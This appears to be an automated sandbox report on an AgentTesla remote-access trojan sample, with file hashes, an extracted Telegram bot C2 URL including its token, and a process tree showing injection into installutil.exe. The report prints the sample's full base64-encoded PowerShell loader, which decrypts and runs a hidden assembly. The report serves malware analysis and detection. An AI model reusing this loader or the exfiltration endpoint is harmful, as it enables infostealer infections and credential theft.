Analysis
-
max time kernel
148s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
23-05-2024 13:54
Static task
static1
Behavioral task
behavioral1
Sample
a9f8962e8fe80bbe7b1462f0c4d776abeb968a6c8f33fca3074a54b45d09ad9a.exe
Resource
win7-20240221-en
General
-
Target
a9f8962e8fe80bbe7b1462f0c4d776abeb968a6c8f33fca3074a54b45d09ad9a.exe
-
Size
988KB
-
MD5
bfeee0c844094e78262beb304526f216
-
SHA1
844c0a9df056cc6690c90814158859e0fe728394
-
SHA256
a9f8962e8fe80bbe7b1462f0c4d776abeb968a6c8f33fca3074a54b45d09ad9a
-
SHA512
ad26d27557d7f8cfd7ddad346dabeb43e66ae9d87197728122bab0a71cda51d82489939d7ceeb9acbc15d41bcf9eb30cb4da7b353316fc9317bd25b8edeb42aa
-
SSDEEP
24576:Hf0htH9iGnLexsKea/NfBe+STqRd3wtsyUUmoXg:HidcGnax+a/N5dKyoXg
Malware Config
Extracted
agenttesla
https://api.telegram.org/bot7170832252:AAF_Vb1zK1ZjcPMY_oQJwptCJR2tZkpXYmo/
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 2680 set thread context of 2448 2680 powershell.exe installutil.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
powershell.exeinstallutil.exepid process 2680 powershell.exe 2680 powershell.exe 2680 powershell.exe 2680 powershell.exe 2680 powershell.exe 2448 installutil.exe 2448 installutil.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exeinstallutil.exedescription pid process Token: SeDebugPrivilege 2680 powershell.exe Token: SeDebugPrivilege 2448 installutil.exe -
Suspicious use of WriteProcessMemory 16 IoCs
Processes:
a9f8962e8fe80bbe7b1462f0c4d776abeb968a6c8f33fca3074a54b45d09ad9a.exepowershell.exedescription pid process target process PID 4308 wrote to memory of 2680 4308 a9f8962e8fe80bbe7b1462f0c4d776abeb968a6c8f33fca3074a54b45d09ad9a.exe powershell.exe PID 4308 wrote to memory of 2680 4308 a9f8962e8fe80bbe7b1462f0c4d776abeb968a6c8f33fca3074a54b45d09ad9a.exe powershell.exe PID 2680 wrote to memory of 1468 2680 powershell.exe regsvcs.exe PID 2680 wrote to memory of 1468 2680 powershell.exe regsvcs.exe PID 2680 wrote to memory of 1468 2680 powershell.exe regsvcs.exe PID 2680 wrote to memory of 2448 2680 powershell.exe installutil.exe PID 2680 wrote to memory of 2448 2680 powershell.exe installutil.exe PID 2680 wrote to memory of 2448 2680 powershell.exe installutil.exe PID 2680 wrote to memory of 2448 2680 powershell.exe installutil.exe PID 2680 wrote to memory of 2448 2680 powershell.exe installutil.exe PID 2680 wrote to memory of 2448 2680 powershell.exe installutil.exe PID 2680 wrote to memory of 2448 2680 powershell.exe installutil.exe PID 2680 wrote to memory of 2448 2680 powershell.exe installutil.exe PID 2680 wrote to memory of 5052 2680 powershell.exe installutil.exe PID 2680 wrote to memory of 5052 2680 powershell.exe installutil.exe PID 2680 wrote to memory of 5052 2680 powershell.exe installutil.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\a9f8962e8fe80bbe7b1462f0c4d776abeb968a6c8f33fca3074a54b45d09ad9a.exe"C:\Users\Admin\AppData\Local\Temp\a9f8962e8fe80bbe7b1462f0c4d776abeb968a6c8f33fca3074a54b45d09ad9a.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4308 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgAMQAwADAAMAAwACkACgAKACQARQYkBkIGKgYgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJABGBkUGSAYwBiwGIAA9ACAAJwBmAGkAbABlAC0AKgAuAHAAdQB0AGkAawAnAAoAJABFBkQGQQZfACMGLgZKBjEGIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQARQYkBkIGKgYgAC0ARgBpAGwAdABlAHIAIAAkAEYGRQZIBjAGLAYgAHwAIABTAG8AcgB0AC0ATwBiAGoAZQBjAHQAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADEACgAKAGYAdQBuAGMAdABpAG8AbgAgAEEGQwZfACcGRAYqBjQGQQZKBjEGIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGQQYqBicGLQYsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiwACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAKAZKBicGRgYnBioGCgAgACAAIAAgACkACgAKACAAIAAgACAAJABFBjQGQQYxBiAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJABFBjQGQQYxBi4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkAEUGNAZBBjEGLgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYgAD0AIAAkAEUGNAZBBjEGLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQARQZBBioGJwYtBiwAIAAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBikACgAgACAAIAAgACQAKAZKBicGRgYnBioGXwBFBkEGQwZIBkMGKQZfACcGRAYqBjQGQQZKBjEGIAA9ACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkACgGSgYnBkYGJwYqBiwAIAAwACwAIAAkACgGSgYnBkYGJwYqBi4ATABlAG4AZwB0AGgAKQAKAAkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJAAoBkoGJwZGBicGKgZfAEUGQQZDBkgGQwYpBl8AJwZEBioGNAZBBkoGMQYKAH0ACgAKACQARQZBBioGJwYtBiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4ADgARgAsACAAMAB4AEEAMwAsACAAMAB4ADUANAAsACAAMAB4ADUAMAAsACAAMAB4ADcAMQAsACAAMAB4ADQAMQAsACAAMAB4AEQAMgAsACAAMAB4AEYANQAsACAAMAB4ADEARAAsACAAMAB4ADMAQgAsACAAMAB4ADcAMgAsACAAMAB4AEEAOAAsACAAMAB4ADMAQwAsACAAMAB4AEUAOQAsACAAMAB4AEMAOQAsACAAMAB4AEYAQQAsACAAMAB4ADkANQAsACAAMAB4ADEAMgAsACAAMAB4AEUARAAsACAAMAB4AEIAQQAsACAAMAB4ADcAMgAsACAAMAB4ADUARAAsACAAMAB4AEYAMQAsACAAMAB4AEUANAAsACAAMAB4ADYAQgAsACAAMAB4AEIAOQAsACAAMAB4ADAARAAsACAAMAB4AEIAMAAsACAAMAB4ADcANwAsACAAMAB4ADIANwAsACAAMAB4ADQAOQAsACAAMAB4AEMAMQApAAoAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeABEADQALAAgADAAeABFAEQALAAgADAAeABBAEMALAAgADAAeAAzAEMALAAgADAAeAAzAEMALAAgADAAeAA0ADQALAAgADAAeAAwAEQALAAgADAAeAA4ADcALAAgADAAeAAwADYALAAgADAAeAA3AEMALAAgADAAeAA2ADgALAAgADAAeAAzADcALAAgADAAeAAxAEQALAAgADAAeAAxAEUALAAgADAAeABGAEIALAAgADAAeABDADMAKQAKAAoAaQBmACAAKAAkAEUGRAZBBl8AIwYuBkoGMQYgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGIAA9ACAAJABFBkQGQQZfACMGLgZKBjEGLgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAKAYnBkoGKgYnBioGXwBFBjQGQQYxBikGIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGKQA7AAoAIAAgACAAIAAkAEUGLQYqBkgGSQZfAEUGQQZDBkgGQwZfACcGRAYqBjQGQQZKBjEGIAA9ACAAQQZDBl8AJwZEBioGNAZBBkoGMQYgAC0ARQZBBioGJwYtBiAAJABFBkEGKgYnBi0GIAAtAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiAAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAC0AKAZKBicGRgYnBioGIAAkACgGJwZKBioGJwYqBl8ARQY0BkEGMQYpBgoACgAgACAAIAAgACQAKgYsBkUGSgY5BiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQARQYtBioGSAZJBl8ARQZBBkMGSAZDBl8AJwZEBioGNAZBBkoGMQYpACkAOwAKACAAIAAgACAAJABGBkIGNwYpBl8AJwZEBi8GLgZIBkQGIAA9ACAAJAAqBiwGRQZKBjkGLgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQARgZCBjcGKQZfACcGRAYvBi4GSAZEBi4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA2⤵
- Suspicious use of SetThreadContext
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2680 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"3⤵PID:1468
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2448
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"3⤵PID:5052
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
33KB
MD57088c133505af9dd34ece4683fb69cbd
SHA129ce71145aaec80bfb0d6e10d992235914715110
SHA2566252e15e89dd49a51309a2e6944e36838752fa6aa619e777d5692a243a1bf316
SHA512061bf41c4ea0d786fdc5be73894d9944bfb67e533bb2b924ece799b19c50714a0573c98a99eb1150b7920fcebbc429eb6a4b71105ed9cb5d67044961910c3b9f